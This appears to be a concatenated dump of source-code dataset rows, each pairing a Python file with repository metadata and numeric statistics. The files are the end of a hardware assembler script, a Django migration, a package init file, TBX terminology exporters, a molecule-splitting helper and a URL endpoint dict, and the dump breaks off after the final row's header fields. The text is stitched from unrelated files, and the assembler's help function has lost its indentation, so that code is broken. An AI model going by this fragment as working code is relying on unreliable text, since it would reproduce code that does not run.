    enable_intermediate_files: keep each pass's output in a *_temp_*.dat file
        next to the output (for debugging) instead of anonymous temp files.
    enable_show_program_labels: print every label position found in pass three.
    """
    internal_labels = dict()
    fill_internal_labels(internal_labels)
    with open(output_file_name, 'w') as output_file, open(input_file_name, 'r') as input_file:
        if(enable_intermediate_files):
            output_file_first_pass = open(output_file_name + '_temp_first_pass.dat', 'w+')
            output_file_second_pass = open(output_file_name + '_temp_second_pass.dat', 'w+')
            output_file_third_pass = open(output_file_name + '_temp_third_pass.dat', 'w+')
        else:
            output_file_first_pass = tempfile.TemporaryFile(mode='r+')
            output_file_second_pass = tempfile.TemporaryFile(mode='r+')
            output_file_third_pass = tempfile.TemporaryFile(mode='r+')
        try:
            assembly_file_remove_comments_change_to_lower_case(input_file, output_file_first_pass)
            output_file_first_pass.seek(0)
            assembly_file_add_constant_labels(output_file_first_pass, output_file_second_pass, internal_labels)
            output_file_second_pass.seek(0)
            assembly_file_solve_instructions_add_position_labels(output_file_second_pass, output_file_third_pass, internal_labels, enable_show_program_labels)
            output_file_third_pass.seek(0)
            assembly_file_solve_remaining_instructions(output_file_third_pass, output_file, internal_labels)
        finally:
            # Bug fix: the pass files were previously closed only when
            # enable_intermediate_files was True, leaking the anonymous
            # temporary files; close all three unconditionally.
            output_file_first_pass.close()
            output_file_second_pass.close()
            output_file_third_pass.close()
def fill_internal_labels(internal_labels):
    """Populate *internal_labels* with every predefined address the assembler
    understands: MAC RAM (with full-bus '.j' and local-bus '.j.z' views),
    base RAM, Keccak buffers, special registers and the user-friendly
    aliases fp2t*/tmpf*/var* that map back into MAC RAM slots."""
    base_words_per_mac_words = 8
    mac_words_per_operand = 8

    def _add_mac_aliases(name, slot):
        # One MAC-word label plus its full-bus ('.j') and local-bus ('.j.z') views.
        internal_labels[name] = slot
        for j in range(mac_words_per_operand):
            internal_labels[name + '.' + str(j)] = slot * mac_words_per_operand + j
            for z in range(base_words_per_mac_words):
                internal_labels[name + '.' + str(j) + '.' + str(z)] = (slot * mac_words_per_operand + j) * base_words_per_mac_words + z

    # MAC RAM labels for internal MAC, full-bus copy and local-bus copy instructions.
    for i in range(256):
        _add_mac_aliases('m' + str(i), i)
    # Program ROM local-bus labels ('p<i>.<j>') were considered but cannot work:
    # the program memory would need to drive the local bus independently of the
    # full bus, costing an extra memory interface.
    # Base RAM labels.
    for i in range(1024):
        internal_labels['b' + str(i)] = 0x0C000 + i
    for i in range(64):
        internal_labels['rd' + str(i)] = 0x0C000 + i
    # Single (special-purpose) labels.
    internal_labels.update({
        'scalar': 0x0C000,
        'keccak_absorb_byte_lsb': 0x0D000,
        'keccak_absorb_byte_msb': 0x0D080,
        'keccak_absorb': 0x0D100,
        'keccak_absorb_swp': 0x0D180,
        'keccak_squeeze_byte': 0x0D200,
        'keccak_squeeze': 0x0D300,
        'keccak_dout': 0x0D400,
        'pc': 0x0E000,
        'rstatus': 0x0E001,
        'roperands': 0x0E002,
        'rprimeline': 0x0E003,
        'rprimeaddr': 0x0E004,
        'rprimeplusoneaddr': 0x0E005,
        'rprimelineaddr': 0x0E006,
        'r2primeaddr': 0x0E007,
        'stackinitaddr': 0x0E008,
        'flag': 0x0E009,
        'scalarinitaddr': 0x0E00A,
    })
    # User-defined aliases into MAC RAM, to ease hand-written assembly:
    # fp2t0-fp2t7, tmpf0-tmpf39, var0-var155 (each with '.j' and '.j.z' views).
    for prefix, base_address, count in (('fp2t', 216, 8), ('tmpf', 20, 40), ('var', 60, 156)):
        for i in range(count):
            _add_mac_aliases(prefix + str(i), base_address + i)
def print_main_class_help():
print('The parameters options are:')
print('')
print('assembler.py assembly_program.txt mounted_program.dat [-l] [-d]')
print('')
print("assembly_program.txt")
print("The input program")
print('')
print("mounted_program.dat")
print("The name of the output, if not specified it will just use the original program name with the .dat extension.")
print('')
print("-l")
print("Enable showing the position of all program labels. This is useful to know certain program positions.")
print('')
print("-d")
print("Enable intermediate output files used by the assembling process. Applied in case of debugging the assembler.")
if __name__ == "__main__":
    # Usage: assembler.py assembly_program.txt [mounted_program.dat] [-l] [-d]
    argc = len(sys.argv)
    if(argc >= 2):
        input_file_name = sys.argv[1]
        enable_intermediate_files = False
        enable_show_program_labels = False
        if('-d' in sys.argv):
            enable_intermediate_files = True
            argc -= 1
        if('-l' in sys.argv):
            enable_show_program_labels = True
            argc -= 1
        if(argc == 3):
            # Explicit output file name given.
            output_file_name = sys.argv[2]
            assembly_file_four_pass(input_file_name, output_file_name, enable_intermediate_files, enable_show_program_labels)
        elif(argc == 2):
            # Default output name: input name with a .dat extension.
            output_file_name = input_file_name.rsplit('.', 1)[0] + '.dat'
            assembly_file_four_pass(input_file_name, output_file_name, enable_intermediate_files, enable_show_program_labels)
        else:
            # Bug fix: previously an explicit output name could be parsed
            # without the assembler ever running, and unexpected positional
            # argument counts were silently ignored.
            print("Unknown amount of options")
            print('')
            print_main_class_help()
    else:
        print("Unknown amount of options")
        print('')
        print_main_class_help()
| 50.439896
| 1,171
| 0.578181
| 18,169
| 135,532
| 4.037481
| 0.034454
| 0.144703
| 0.143299
| 0.059831
| 0.897297
| 0.879398
| 0.871955
| 0.855651
| 0.84709
| 0.842115
| 0
| 0.088326
| 0.25695
| 135,532
| 2,687
| 1,172
| 50.439896
| 0.640095
| 0.168676
| 0
| 0.860664
| 0
| 0.000503
| 0.067421
| 0.000595
| 0.126761
| 0
| 0.001345
| 0
| 0
| 1
| 0.023139
| false
| 0.04326
| 0.001509
| 0.001006
| 0.077465
| 0.048793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e88eefb6819d05e0671da287159c41dd47af66d9
| 1,476
|
py
|
Python
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 11
|
2018-06-11T06:05:12.000Z
|
2022-03-25T09:31:44.000Z
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 498
|
2017-11-07T21:20:13.000Z
|
2022-03-31T14:37:18.000Z
|
api/migrations/0023_auto_20190724_0841.py
|
IFRCGo/ifrcgo-api
|
c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a
|
[
"MIT"
] | 6
|
2018-04-11T13:29:50.000Z
|
2020-07-16T16:52:11.000Z
|
# Generated by Django 2.0.12 on 2019-07-24 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 2.0.12, 2019-07-24).

    Adds seven optional fields to the 'fieldreport' model:
    other_num_{affected,assisted,dead,displaced,injured,missing}
    (IntegerField) and start_date (DateTimeField). All are blank=True /
    null=True, so existing rows need no default value or data backfill.
    """

    # Must apply after the appeal real-data update migration.
    dependencies = [
        ('api', '0022_appeal_real_data_update'),
    ]

    operations = [
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_affected',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_assisted',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_dead',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_displaced',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_injured',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='other_num_missing',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='fieldreport',
            name='start_date',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
| 30.122449
| 62
| 0.575881
| 141
| 1,476
| 5.858156
| 0.333333
| 0.152542
| 0.194915
| 0.228814
| 0.7046
| 0.7046
| 0.7046
| 0.7046
| 0.644068
| 0.644068
| 0
| 0.019685
| 0.311653
| 1,476
| 48
| 63
| 30.75
| 0.793307
| 0.031165
| 0
| 0.642857
| 1
| 0
| 0.154762
| 0.019608
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e892b2d40c1ded2208b2c955a7039367421233a1
| 84
|
py
|
Python
|
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | 4
|
2020-03-06T18:38:38.000Z
|
2020-03-07T02:49:46.000Z
|
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | null | null | null |
easy_exceptions/__init__.py
|
riegie/EasyExceptions
|
72c8991b097be11ed58d3219376670e3d333a91e
|
[
"MIT"
] | 1
|
2020-03-10T17:33:21.000Z
|
2020-03-10T17:33:21.000Z
|
from .easy_exceptions import EasyException
from .easy_exceptions import bind_parent
| 28
| 42
| 0.880952
| 11
| 84
| 6.454545
| 0.636364
| 0.225352
| 0.507042
| 0.676056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 84
| 2
| 43
| 42
| 0.934211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e89848a02d19b512a6aab1aa3dc56c35679cf729
| 5,292
|
py
|
Python
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 1,145
|
2015-05-15T01:08:16.000Z
|
2022-03-31T14:23:45.000Z
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 1,365
|
2015-05-04T21:54:18.000Z
|
2022-03-30T16:53:49.000Z
|
pontoon/terminology/utils.py
|
foss4/pontoon
|
0503cc78f00e1e9d23c1ca885fe74a627563fc82
|
[
"BSD-3-Clause"
] | 667
|
2015-05-04T21:33:45.000Z
|
2022-03-30T10:25:33.000Z
|
from xml.sax.saxutils import escape, quoteattr
def build_tbx_v2_file(term_translations, locale):
    """
    Generates contents of the TBX 2008 (v2) file (TBX-Default dialect):

    TBX files could contain large amount of entries and it's impossible to render all the data with
    django templates. Rendering a string in memory is a lot faster.

    term_translations: iterable of translation objects; each exposes .text and
        a .term with .pk, .text, .part_of_speech, .definition and .usage.
    locale: target language code, emitted (quoted by quoteattr) as xml:lang.
    Yields: string chunks — fixed header, one <termEntry> per translation,
        then the closing footer.
    """
    # Fixed TBX v2 (martif) header, yielded as one chunk.
    yield (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '\n<!DOCTYPE martif SYSTEM "TBXcoreStructV02.dtd">'
        '\n<martif type="TBX" xml:lang="en-US">'
        "\n\t<martifHeader>"
        "\n\t\t<fileDesc>"
        "\n\t\t\t<titleStmt>"
        "\n\t\t\t\t<title>Mozilla Terms</title>"
        "\n\t\t\t</titleStmt>"
        "\n\t\t\t<sourceDesc>"
        "\n\t\t\t\t<p>from a Mozilla termbase</p>"
        "\n\t\t\t</sourceDesc>"
        "\n\t\t</fileDesc>"
        "\n\t\t<encodingDesc>"
        '\n\t\t\t<p type="XCSURI">TBXXCSV02.xcs</p>'
        "\n\t\t</encodingDesc>"
        "\n\t</martifHeader>"
        "\n\t<text>"
        "\n\t\t<body>"
    )

    for translation in term_translations:
        term = translation.term
        # escape() XML-escapes element text; quoteattr() quotes-and-escapes the
        # locale, so %(locale)s is interpolated without surrounding quotes.
        yield (
            '\n\t\t\t<termEntry id="c%(id)s">'
            '\n\t\t\t\t<descrip type="context">%(usage)s</descrip>'
            '\n\t\t\t\t<langSet xml:lang="en-US">'
            "\n\t\t\t\t\t<ntig>"
            "\n\t\t\t\t\t\t<termGrp>"
            "\n\t\t\t\t\t\t\t<term>%(term)s</term>"
            '\n\t\t\t\t\t\t\t<termNote type="partOfSpeech">%(part_of_speech)s</termNote>'
            "\n\t\t\t\t\t\t</termGrp>"
            "\n\t\t\t\t\t</ntig>"
            "\n\t\t\t\t\t<descripGrp>"
            '\n\t\t\t\t\t\t<descrip type="definition">%(definition)s</descrip>'
            "\n\t\t\t\t\t</descripGrp>"
            "\n\t\t\t\t</langSet>"
            "\n\t\t\t\t<langSet xml:lang=%(locale)s>"
            "\n\t\t\t\t\t<ntig>"
            "\n\t\t\t\t\t\t<termGrp>"
            "\n\t\t\t\t\t\t\t<term>%(translation)s</term>"
            "\n\t\t\t\t\t\t</termGrp>"
            "\n\t\t\t\t\t</ntig>"
            "\n\t\t\t\t</langSet>"
            "\n\t\t\t</termEntry>"
            % {
                "id": term.pk,
                "term": escape(term.text),
                "part_of_speech": escape(term.part_of_speech),
                "definition": escape(term.definition),
                "usage": escape(term.usage),
                "locale": quoteattr(locale),
                "translation": escape(translation.text),
            }
        )

    # Closing footer (adjacent string literals concatenate).
    yield ("\n\t\t</body>" "\n\t</text>" "\n</martif>\n")
def build_tbx_v3_file(term_translations, locale):
    """
    Generates contents of the TBX v3 file (TBX-Basic dialect, DCT style):

    TBX files could contain large amount of entries and it's impossible to render all the data with
    django templates. Rendering a string in memory is a lot faster.

    term_translations: iterable of translation objects; each exposes .text and
        a .term with .pk, .text, .part_of_speech, .definition and .usage.
    locale: target language code, emitted (quoted by quoteattr) as xml:lang.
    Yields: string chunks — fixed header, one <conceptEntry> per translation,
        then the closing footer.
    """
    # Fixed TBX v3 header with the TBX-Basic schema references.
    yield (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '\n<?xml-model href="https://raw.githubusercontent.com/LTAC-Global/TBX-Basic_dialect/master/DCA/TBXcoreStructV03_TBX-Basic_integrated.rng" type="application/xml" schematypens="http://relaxng.org/ns/structure/1.0"?>'
        '\n<?xml-model href="https://raw.githubusercontent.com/LTAC-Global/TBX-Basic_dialect/master/DCA/TBX-Basic_DCA.sch" type="application/xml" schematypens="http://purl.oclc.org/dsdl/schematron"?>'
        '\n<tbx style="dca" type="TBX-Basic" xml:lang="en" xmlns="urn:iso:std:iso:30042:ed-2">'
        "\n\t<tbxHeader>"
        "\n\t\t<fileDesc>"
        "\n\t\t\t<titleStmt>"
        "\n\t\t\t\t<title>Mozilla Terms</title>"
        "\n\t\t\t</titleStmt>"
        "\n\t\t\t<sourceDesc>"
        "\n\t\t\t\t<p>from a Mozilla termbase</p>"
        "\n\t\t\t</sourceDesc>"
        "\n\t\t</fileDesc>"
        "\n\t\t<encodingDesc>"
        '\n\t\t\t<p type="XCSURI">TBXXCSV02.xcs</p>'
        "\n\t\t</encodingDesc>"
        "\n\t</tbxHeader>"
        "\n\t<text>"
        "\n\t\t<body>"
    )

    for translation in term_translations:
        term = translation.term
        # escape() XML-escapes element text; quoteattr() quotes-and-escapes the
        # locale, so %(locale)s is interpolated without surrounding quotes.
        yield (
            '\n\t\t\t<conceptEntry id="c%(id)s">'
            '\n\t\t\t\t<langSec xml:lang="en-US">'
            "\n\t\t\t\t\t<termSec>"
            "\n\t\t\t\t\t\t<term>%(term)s</term>"
            '\n\t\t\t\t\t\t<termNote type="partOfSpeech">%(part_of_speech)s</termNote>'
            "\n\t\t\t\t\t\t<descripGrp>"
            '\n\t\t\t\t\t\t\t<descrip type="definition">%(definition)s</descrip>'
            '\n\t\t\t\t\t\t\t<descrip type="context">%(usage)s</descrip>'
            "\n\t\t\t\t\t\t</descripGrp>"
            "\n\t\t\t\t\t</termSec>"
            "\n\t\t\t\t</langSec>"
            "\n\t\t\t\t<langSec xml:lang=%(locale)s>"
            "\n\t\t\t\t\t<termSec>"
            "\n\t\t\t\t\t\t<term>%(translation)s</term>"
            "\n\t\t\t\t\t</termSec>"
            "\n\t\t\t\t</langSec>"
            "\n\t\t\t</conceptEntry>"
            % {
                "id": term.pk,
                "term": escape(term.text),
                "part_of_speech": escape(term.part_of_speech),
                "definition": escape(term.definition),
                "usage": escape(term.usage),
                "locale": quoteattr(locale),
                "translation": escape(translation.text),
            }
        )

    # Closing footer (adjacent string literals concatenate).
    yield ("\n\t\t</body>" "\n\t</text>" "\n</tbx>\n")
| 40.396947
| 223
| 0.51833
| 809
| 5,292
| 3.357231
| 0.170581
| 0.146539
| 0.149116
| 0.122239
| 0.874448
| 0.833211
| 0.81296
| 0.81296
| 0.801915
| 0.757732
| 0
| 0.007768
| 0.270219
| 5,292
| 130
| 224
| 40.707692
| 0.695495
| 0.086735
| 0
| 0.618182
| 1
| 0.118182
| 0.570832
| 0.239866
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0.009091
| 0
| 0.027273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e89bf4489261eaddb826ecce906fb72d18ebf969
| 8,980
|
py
|
Python
|
analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import os
import glob
import pathlib
def stratify_target(data_df, output_dir, task_col_name,
                    split_size=96, cluster_col_name='BT_0.4 ID',
                    random_seed=20190918):
    """Split labeled rows of *data_df* into plates of *split_size* rows, each
    receiving a proportional share of actives, and write one CSV per plate to
    *output_dir* as 'unlabeled_<i>.csv'.

    data_df: DataFrame with an 'Index ID' column, a binary label column
        *task_col_name* (1 = active, 0 = inactive) and a cluster-id column
        *cluster_col_name* — assumed from usage below; TODO confirm schema.
    Deterministic for a given random_seed. Ends by asserting that the written
    splits, concatenated and re-sorted, reproduce data_df exactly.
    """
    np.random.seed(random_seed)
    # Keep only rows with a defined label, in a deterministic 'Index ID' order.
    data_df = data_df[~pd.isna(data_df[task_col_name])]
    data_df = data_df.sort_values('Index ID')
    data_df = data_df.reset_index(drop=True)
    data_df = data_df.dropna()
    # Positional (iloc-compatible) indices of actives and inactives.
    active_indices = np.where(data_df[task_col_name] == 1)[0]
    inactive_indices = np.where(data_df[task_col_name] == 0)[0]
    u, c = np.unique(data_df[cluster_col_name], return_counts=True)
    n_clusters = u.shape[0]
    n_singletons = np.where(c == 1)[0].shape[0]
    n_singletons_with_hits = data_df[data_df[cluster_col_name].isin(u[np.where(c == 1)[0]])][task_col_name].sum()
    # target info
    print('Target {}'.format(task_col_name))
    print('Total molecules: {}, Total active: {}, Total inactive: {}, Total clusters: {}.'.format(data_df.shape[0],
                                                                                                 active_indices.shape[0],
                                                                                                 inactive_indices.shape[0],
                                                                                                 np.unique(data_df[cluster_col_name]).shape[0]))
    print('Clusters #: {}. Singletons #: {}. Singletons with hits #: {}'.format(n_clusters,
                                                                                n_singletons,
                                                                                n_singletons_with_hits))
    # split into plates
    # NOTE(review): always data_df.shape[0]//split_size + 1 splits, even when
    # evenly divisible — the final split may then be empty.
    num_splits = data_df.shape[0]//split_size + 1
    actives_per_split = int(np.ceil(active_indices.shape[0]/num_splits))
    inactives_per_split = split_size - actives_per_split
    rnd_active_idx = np.random.permutation(active_indices)
    rnd_inactive_idx = np.random.permutation(inactive_indices)
    split_indices = np.random.permutation(num_splits)
    active_i, inactive_i = 0, 0
    total_mols, total_actives, total_inactives = 0, 0, 0
    for split_count, split_i in enumerate(split_indices):
        curr_indices = []
        curr_split_size = split_size
        if split_count == (num_splits-1):
            # Last processed split absorbs the remainder rows.
            curr_split_size = data_df.shape[0] - split_size*(num_splits-1)
        # get random actives for this split
        for i in range(actives_per_split):
            if active_i < rnd_active_idx.shape[0]:
                curr_indices.append(rnd_active_idx[active_i])
                active_i += 1
                curr_split_size-=1
        # get random inactives for this split
        for i in range(curr_split_size):
            if inactive_i < rnd_inactive_idx.shape[0]:
                curr_indices.append(rnd_inactive_idx[inactive_i])
                inactive_i += 1
        # shuffle the selected cpds
        curr_indices = np.random.permutation(curr_indices)
        curr_split_df = data_df.iloc[curr_indices,:]
        # save the split to file
        split_mols = curr_split_df.shape[0]
        split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
        split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
        total_mols += split_mols
        total_actives += split_actives
        total_inactives += split_inactives
        curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(split_i),
                             index=False)
        print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(split_i, split_mols,
                                                                                           split_actives,
                                                                                           split_inactives))
    print('Total molecules: {}, Total active: {}, Total inactive: {}.'.format(total_mols, total_actives, total_inactives))
    # assert correctness: re-reading all split files must reproduce data_df.
    cdf = pd.concat([pd.read_csv(x) for x in glob.glob(output_dir+'/unlabeled_*.csv')])
    cdf = cdf.sort_values('Index ID')
    cdf = cdf.reset_index(drop=True)
    assert cdf.equals(data_df)
def stratify_target_alt(data_df, output_dir, task_col_name,
                        num_samples=10, num_actives_in_split=1,
                        split_size=96, cluster_col_name='BT_0.4 ID',
                        random_seed=20190918):
    """Alternate stratification: write *num_samples* plates of *split_size*
    rows, each seeded with *num_actives_in_split* actives, then dump ALL
    remaining rows into one final 'unlabeled_<num_samples>.csv'.

    Same input expectations as stratify_target (binary *task_col_name*,
    'Index ID' and *cluster_col_name* columns — assumed from usage; TODO
    confirm schema). Deterministic for a given random_seed; ends by asserting
    the written splits reproduce data_df exactly.
    """
    np.random.seed(random_seed)
    # Keep only rows with a defined label, in a deterministic 'Index ID' order.
    data_df = data_df[~pd.isna(data_df[task_col_name])]
    data_df = data_df.sort_values('Index ID')
    data_df = data_df.dropna()
    data_df = data_df.reset_index(drop=True)
    # Positional (iloc-compatible) indices of actives and inactives.
    active_indices = np.where(data_df[task_col_name] == 1)[0]
    inactive_indices = np.where(data_df[task_col_name] == 0)[0]
    u, c = np.unique(data_df[cluster_col_name], return_counts=True)
    n_clusters = u.shape[0]
    n_singletons = np.where(c == 1)[0].shape[0]
    n_singletons_with_hits = data_df[data_df[cluster_col_name].isin(u[np.where(c == 1)[0]])][task_col_name].sum()
    # target info
    print('Target {}'.format(task_col_name))
    print('Total molecules: {}, Total active: {}, Total inactive: {}, Total clusters: {}.'.format(data_df.shape[0],
                                                                                                 active_indices.shape[0],
                                                                                                 inactive_indices.shape[0],
                                                                                                 np.unique(data_df[cluster_col_name]).shape[0]))
    print('Clusters #: {}. Singletons #: {}. Singletons with hits #: {}'.format(n_clusters,
                                                                                n_singletons,
                                                                                n_singletons_with_hits))
    # split into plates
    rnd_active_idx = np.random.permutation(active_indices)
    rnd_inactive_idx = np.random.permutation(inactive_indices)
    active_i, inactive_i = 0, 0
    total_mols, total_actives, total_inactives = 0, 0, 0
    for split_i in np.arange(num_samples):
        curr_indices = []
        curr_split_size = split_size
        # get random actives for this split
        for i in range(num_actives_in_split):
            if active_i < rnd_active_idx.shape[0]:
                curr_indices.append(rnd_active_idx[active_i])
                active_i += 1
                curr_split_size-=1
        # get random inactives for this split
        for i in range(curr_split_size):
            if inactive_i < rnd_inactive_idx.shape[0]:
                curr_indices.append(rnd_inactive_idx[inactive_i])
                inactive_i += 1
        # shuffle the selected cpds
        curr_indices = np.random.permutation(curr_indices)
        curr_split_df = data_df.iloc[curr_indices,:]
        # save the split to file
        split_mols = curr_split_df.shape[0]
        split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
        split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
        total_mols += split_mols
        total_actives += split_actives
        total_inactives += split_inactives
        curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(split_i),
                             index=False)
        print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(split_i, split_mols,
                                                                                           split_actives,
                                                                                           split_inactives))
    # shuffle the selected cpds — everything not yet consumed goes into one
    # final catch-all split.
    curr_indices = np.hstack([rnd_active_idx[active_i:], rnd_inactive_idx[inactive_i:]])
    curr_indices = np.random.permutation(curr_indices)
    curr_split_df = data_df.iloc[curr_indices,:]
    # save the split to file
    split_mols = curr_split_df.shape[0]
    split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
    split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
    total_mols += split_mols
    total_actives += split_actives
    total_inactives += split_inactives
    curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(num_samples),
                         index=False)
    print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(num_samples, split_mols,
                                                                                       split_actives,
                                                                                       split_inactives))
    print('Total molecules: {}, Total active: {}, Total inactive: {}.'.format(total_mols, total_actives, total_inactives))
    # assert correctness: re-reading all split files must reproduce data_df.
    cdf = pd.concat([pd.read_csv(x) for x in glob.glob(output_dir+'/unlabeled_*.csv')])
    cdf = cdf.sort_values('Index ID')
    cdf = cdf.reset_index(drop=True)
    assert cdf.equals(data_df)
| 48.27957
| 122
| 0.569488
| 1,099
| 8,980
| 4.318471
| 0.098271
| 0.051833
| 0.048673
| 0.03287
| 0.911504
| 0.897598
| 0.888748
| 0.856511
| 0.846397
| 0.846397
| 0
| 0.015963
| 0.33029
| 8,980
| 186
| 123
| 48.27957
| 0.773196
| 0.042762
| 0
| 0.847826
| 0
| 0
| 0.086713
| 0
| 0
| 0
| 0
| 0
| 0.014493
| 1
| 0.014493
| false
| 0
| 0.036232
| 0
| 0.050725
| 0.07971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8d24239bd6f33919168d994f39d305bad68c05b
| 275
|
py
|
Python
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 2
|
2016-09-15T20:17:43.000Z
|
2017-01-08T03:32:43.000Z
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 183
|
2017-12-21T11:04:37.000Z
|
2019-03-27T08:14:34.000Z
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 12
|
2016-09-05T12:07:48.000Z
|
2019-02-26T09:24:17.000Z
|
# URL path templates for the auctions API; the '{...}' placeholders are meant
# to be filled in by callers (e.g. via str.format).
ENDPOINTS = {
    'auction': '/auctions/{auction_id}',
    'contract': '/auctions/{auction_id}/contracts/{contract_id}',
    'contracts': '/auctions/{auction_id}/contracts',
    'item': '/auctions/{auction_id}/items/{item_id}',
    'items': '/auctions/{auction_id}/items',
}
| 34.375
| 65
| 0.647273
| 29
| 275
| 5.896552
| 0.275862
| 0.438596
| 0.497076
| 0.304094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123636
| 275
| 7
| 66
| 39.285714
| 0.709544
| 0
| 0
| 0
| 0
| 0
| 0.723636
| 0.603636
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa3570aa0d9160360bce2b658ecee26fc8b14bd7
| 19,188
|
py
|
Python
|
tests/test_fms_api_team_avatar_parser.py
|
tervay/the-blue-alliance
|
e14c15cb04b455f90a2fcfdf4c1cdbf8454e17f8
|
[
"MIT"
] | 1
|
2016-03-19T20:29:35.000Z
|
2016-03-19T20:29:35.000Z
|
tests/test_fms_api_team_avatar_parser.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | 11
|
2020-10-10T03:05:29.000Z
|
2022-02-27T09:57:22.000Z
|
tests/test_fms_api_team_avatar_parser.py
|
gregmarra/the-blue-alliance
|
